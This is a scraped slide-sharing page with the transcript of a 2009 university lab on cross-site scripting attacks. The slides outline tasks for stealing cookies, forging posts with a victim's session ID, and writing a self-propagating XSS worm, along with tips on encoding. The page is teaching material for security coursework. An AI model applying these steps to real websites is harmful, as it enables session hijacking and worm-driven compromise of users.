Cross-Site Scripting (XSS) Attack Lab

Slides:



Advertisements
Similar presentations
PHP Form and File Handling
Advertisements

Nick Feamster CS 6262 Spring 2009
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Protecting Browsers from Cross-Origin CSS Attacks Lin-Shung Huang, Zack Weinberg Carnegie Mellon University Chris Evans Google Collin Jackson Carnegie.
17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
Languages for Dynamic Web Documents
Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Web Same-Origin-Policy Lab Zutao Zhu 11/06/2009. Outline Background Setting SOP.
Session Management A290/A590, Fall /25/2014.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
March Intensive: XSS Exploits
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Workshop 3 Web Application Security Li Weichao March
Cookies Cross site scripting
Introduction to PHP and Server Side Technology. Slide 2 PHP History Created in 1995 PHP 5.0 is the current version It’s been around since 2004.
Prevent Cross-Site Scripting (XSS) attack
Comp2513 Forms and CGI Server Applications Daniel L. Silver, Ph.D.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
JavaScript, Fourth Edition
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
9 Chapter Nine Compiled Web Server Programs. 9 Chapter Objectives Learn about Common Gateway Interface (CGI) Create CGI programs that generate dynamic.
USING PERL FOR CGI PROGRAMMING
Srikar Nadipally. Outline Finding and Exploiting XSS Vulnerabilities Standard Reflected XSS Stored XSS DOM based XSS Prevention of XSS attack Reflect.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Foundations of Network and Computer Security J J ohn Black CSCI 6268/TLEN 5550, Spring 2013.
1 Chapter 9 – Cookies, Sessions, FTP, and More spring into PHP 5 by Steven Holzner Slides were developed by Jack Davis College of Information Science.
Session and Cookie Management in.Net Sandeep Kiran Shiva UIN:
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Copyright © 2012 UNICOM Systems, Inc. Confidential Information z/Ware Product Overview illustro Systems International A Division of UNICOM Global.
Server-side Programming The combination of –HTML –JavaScript –DOM is sometimes referred to as Dynamic HTML (DHTML) Web pages that include scripting are.
Asynchronous Javascript And XML AJAX : an introduction UFCEUS-20-2 : Web Programming.
ASP. What is ASP? ASP stands for Active Server Pages ASP is a Microsoft Technology ASP is a program that runs inside IIS IIS stands for Internet Information.
Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
27.1 Chapter 27 WWW and HTTP Copyright © The McGraw-Hill Companies, Inc. Permission required for reproduction or display.
ICM – API Server Gary Ratcliffe. 2 Agenda Webinar Programme API Server Overview JSON-RPC iCM API Service API Server and Forms New services under.
>> PHP: File Uploads. Pre-requisite Go Online – Download file modify-item.php – copy it to your root folder (D:\xampp\htdocs\Buy4mMe) Web-Based Systems.
Web Authoring with Dreamweaver. Unit Objectives  Be able to define keywords: HTML, HTTP (protocol), browser, web server, client/server, tag, attribute,
CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits.
 Samy (also known as JS.Spacehero)  XSS worm that was designed to propagate across the MySpace social-networking site. At the time of release, it.
Raina NEC Application Object Describes the methods, properties, and collections of the object that stores information related to the entire Web.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
1 Chapter 22 World Wide Web (HTTP) Chapter 22 World Wide Web (HTTP) Mi-Jung Choi Dept. of Computer Science and Engineering
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Web Application with AJAX CS 526 advanced interned and Web system Presenters Faris Kateb Mohammed AbdulAziz Omar Alzahrani.
WStore Programmer Guide Resources management integration.
Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Group 18: Chris Hood Brett Poche
CSCE 548 Student Presentation Ryan Labrador
z/Ware 2.0 Technical Overview
What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.
Testing REST IPA using POSTMAN
Auditing Etsy The Security of Etsy
Chapter 27 WWW and HTTP.
CNIT 131 HTML5 – Anchor/Link.
Web Systems Development (CSC-215)
Cross-Site Request Forgery (CSRF) Attack Lab
PHP and Forms.
Exploring DOM-Based Cross Site Attacks
Cross-Site Scripting Attack (XSS)
Cross Site Request Forgery (CSRF)
Presentation transcript:

Cross-Site Scripting (XSS) Attack Lab Zutao Zhu 11/10/2009

Outline Basic idea

Basic Idea

Task 1 Run the code

Task 2 Run the code

Task 3 Run the code Pay attention to the empty space in the cookie You can use escape() to delete the space in cookie http://www.w3schools.com/jsref/jsref_escape.asp

Task 4 Change the sample code to include cookie into the post data Use urlConn.addRequestProperty() http://java.sun.com/j2se/1.4.2/docs/api/java/net/URLConnection.html Refer to http://java.sun.com/ to learn how to install JDK

Task 5 Goal: When the victim clicks this post, it will automatically create a post for this victim. Steps: Retrieve the session ID of the user using JavaScript. Forge a HTTP post request to post a message using the session ID.

Task 5 Write an XSS worm construct the Http request find the sid in cookie construct the content to send, the format of the content can be get from LiveHttpHeader Send Try to minimize the size of the script

Task 6 To be able to propagate itself, the forged message should also include a worm, so whenever somebody clicks on the forged message, a new forged message that carry the same worm will be created. This way, the worm can be propagated.

Task 6 Self-Propagating XSS Worm making a copy of itself when posting the message ensuring the message posted is encoded using URL encoding

Strategy Uses DOM API for making a copy of itself Uses the JavaScript function encode() for the purpose of URL encoding Avoids using the ‘+’ symbol for string concatenation and addition, because URL encoding use ‘+’ to denote a space Uses absolute values, avoids number manipulation, and the concat() function for string concatenation

Note concat() - Combines the text of two or more strings and returns a new string.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.